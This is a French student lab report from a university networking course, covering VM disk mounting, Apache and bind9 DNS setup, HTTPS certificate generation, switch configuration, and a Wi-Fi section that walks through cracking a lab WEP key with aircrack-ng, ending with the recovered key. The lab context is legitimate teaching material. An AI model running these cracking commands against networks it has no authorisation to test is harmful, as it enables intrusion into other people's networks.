Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                        21112019        ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site&lt;br /&gt;
@       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
